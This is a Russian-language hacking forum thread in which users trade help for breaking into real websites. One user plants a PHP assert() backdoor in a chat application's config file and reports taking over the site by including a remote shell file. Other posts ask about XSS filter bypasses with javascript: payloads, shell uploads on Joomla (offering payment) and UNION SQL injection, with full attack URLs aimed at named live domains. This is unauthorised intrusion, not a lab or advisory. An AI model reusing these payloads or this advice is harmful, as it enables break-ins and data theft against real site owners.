HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2471  
Старый 09.12.2018, 18:48
L73898UNIT
Guest
Сообщений: n/a
Провел на форуме:
2386

Репутация: 0
По умолчанию

UPD: Пробовал внести вредоносный скрипт через пароль менеджера (перезаписывает config). Вышло только с phpinfo(), а другие функции "show_source, system, shell_exec, passthru, exec, popen, proc_open" - отключены в disable_functions. Подскажите, как еще можно реализовать атаку?
 
Ответить с цитированием

  #2472  
Старый 09.12.2018, 19:28
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от L73898UNIT  
L73898UNIT said:

UPD: Пробовал внести вредоносный скрипт через пароль менеджера (перезаписывает config). Вышло только с phpinfo(), а другие функции "show_source, system, shell_exec, passthru, exec, popen, proc_open" - отключены в disable_functions. Подскажите, как еще можно реализовать атаку?
Попробуй eval, assert.
 
Ответить с цитированием

  #2473  
Старый 09.12.2018, 22:02
L73898UNIT
Guest
Сообщений: n/a
Провел на форуме:
2386

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:

Попробуй eval, assert.
Успешно внедрил в ..config.php 1"); assert(stripslashes($_REQUEST[cmd])); /*


И теперь можно делать так: https://site.com/chat/..config.php?cmd=phpinfo()


Круто, но более интересные функции не работают, даже phpversion()... если я конечно правильно использую эти функции Может проблема в том, что перезаписью ..config.php ничего не добиться?

Также в phpinfo заметил:

allow_url_fopen On

allow_url_include On
 
Ответить с цитированием

  #2474  
Старый 10.12.2018, 00:28
Тот_самый_Щуп
Guest
Сообщений: n/a
Провел на форуме:
47768

Репутация: 119
По умолчанию

Цитата:
Сообщение от MORPHINE  
MORPHINE said:

Успешно внедрил в ..config.php
1"); assert(stripslashes($_REQUEST[cmd])); /*

И теперь можно делать так:
https://site.com/chat/..config.php?cmd=phpinfo()

Круто, но более интересные функции не работают, даже phpversion()... если я конечно правильно использую эти функции
Может проблема в том, что перезаписью ..config.php ничего не добиться?
Также в phpinfo заметил:
allow_url_fopen On

allow_url_include On

Так тебе же коллеги писали, пробуй system() passthru() copy(), но сначала найди врайтабельную папку предварительно, доступную из под веба. И не забывай, тебя дома ждет семья.
 
Ответить с цитированием

  #2475  
Старый 10.12.2018, 03:48
L73898UNIT
Guest
Сообщений: n/a
Провел на форуме:
2386

Репутация: 0
По умолчанию

Сайт успешно взломан через cmd=include('https://site.com/shell.txt'), всем спасибо)
 
Ответить с цитированием

  #2476  
Старый 10.12.2018, 09:43
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от L73898UNIT  
L73898UNIT said:

Сайт успешно взломан
Ну всё, суши сухари.
 
Ответить с цитированием

  #2477  
Старый 20.12.2018, 03:30
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Есть отраженый парамерт могу я как то указать сторонии адрес чтоб выполнить XSS ? фильтруется " ' <>

Код:
Code:
А также часто встречяется отраженые параметры в

Код:
Code:
action="vdv{тут}bfd"
href="vdv{тут}bfd"
собствено можно выполнить как то XSS когда до и после параметров какой то мусор ?

Код:
Code:
action="javascript:alert(1)"
href="javascript:alert(1)"
 
Ответить с цитированием

  #2478  
Старый 23.12.2018, 22:45
holdik
Guest
Сообщений: n/a
Провел на форуме:
3124

Репутация: 2
По умолчанию

Подскажите, как залить шелл Joomla 3, с правами администратора(не суперадмин). Шаблоны править не даёт.

за годный способ заплачу, спасибо
 
Ответить с цитированием

  #2479  
Старый 03.01.2019, 19:19
2dd
Guest
Сообщений: n/a
Провел на форуме:
1798

Репутация: 0
По умолчанию

Помогите раскрутить SQL с жесткой фильтрацией. На входе есть 3 параметра которые попадают в SQL запрос, но мешают фильтры, поэтому у векторов с выводом в ошибку шансов совсем мало.

Решил попробовать вектор union select, через order+by подобрал колонки, их 45 штук, фильтр на слово select обходится так: union(select)

пробую запрос:

Код:
Code:
http://androfly.ir/wp-content/themes/marketica-wp/sql.php?id1=gfddg11'&id2=gfddg22'&id3=1)union(select(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45))#
и тут засада, такой запрос блокируется... если на одну колонку больше или меньше, то всё проходит.

буду благодарен!
 
Ответить с цитированием

  #2480  
Старый 04.01.2019, 11:38
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Помогите раскрутить, странная скуля

Код:
Code:
https://www.hellinger.com/index.php?eID=tx_positioner_eID&data=%257B%2522userFunc%2522%253A%2522tx_positioner_pi1-%253Emain%2522%252C%2522ajaxResultLimit%2522%253A%252250%2522%252C%2522listViewImageHeight%2522%253A%2522100%2522%252C%2522ajaxSearchOrderBy%2522%253A%2522substring_index%2528storename%252C%2B%2527%2B%2527%252C%2B-1%2529%2522%252C%2522_LOCAL_LANG.%2522%253A%257B%2522de.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Aufstellername%2522%257D%252C%2522en.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Name%2Bof%2Bconstellator%2522%257D%252C%2522fr.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Name%2Bof%2Bconstellator%2522%257D%252C%2522it.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Nome%2Bdel%2Bcostellatore%2522%257D%252C%2522es.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Nombre%2Bdel%2Bconstelador%2522%257D%252C%2522br.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522Nome%2Bdo%2Bconstelador%2522%257D%252C%2522ru.%2522%253A%257B%2522placeholderPositionerName%2522%253A%2522%255Cu0418%255Cu043c%255Cu044f%2B%255Cu0440%255Cu0430%255Cu0441%255Cu0441%255Cu0442%255Cu0430%255Cu043d%255Cu043e%255Cu0432%255Cu0449%255Cu0438%255Cu043a%255Cu0430%2522%257D%257D%252C%2522cosmicPowerEnabled%2522%253Anull%252C%2522templateFile%2522%253A%2522fileadmin%255C%252Fweb%255C%252Ftemplates%255C%252Fviews%255C%252Fpositioner%255C%252Ftemplate.html%2522%252C%2522cssFile%2522%253A%2522fileadmin%255C%252Fweb%255C%252Ftemplates%255C%252Fviews%255C%252Fpositioner%255C%252Flayout.css%2522%252C%2522detailsPageId%2522%253A%25221205%2522%252C%2522seminarDetailsPageId%2522%253A%2522%2522%252C%2522mailFormPageId%2522%253A%2522%2522%252C%2522externalSeminarRegisterPageId%2522%253A%2522%2522%252C%2522memberListItemsPerPage%2522%253A%2522%2522%252C%2522memberContactPageId%2522%253A%2522%2522%252C%2522shopPageId%2522%253A%2522%2522%252C%2522testSystem%2522%253A%25220%2522%252C%2522activityCategories%2522%253A%25221%252C2%252C3%252C4%252C5%252C6%252C50%252C51%252C52%252C53%2522%252C%2522displayMode%2522%253A%2522ajaxSearchForm%2522%252C%2522pid_list%2522%253A%2522447%2522%252C%2522_GP%2522%253A%257B%2522action%2522%253A%2522viewSearchForm%2522%257D%252C%2522lang%2522%253A%2522en%2522%252C%2522pageId%2522%253A%25221204%2522%257D&tx_positioner_pi1%5Baction%5D=search&tx_positioner_pi1%5Bsearch%5D=Germany&tx_positioner_pi1%5Blat%5D=&tx_positioner_pi1%5Blon%5D=&tx_positioner_pi1%5Bradius%5D=50&tx_positioner_pi1%5Bactivities%5D=1&tx_positioner_pi1%5Bqualification%5D=google_HD.png
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ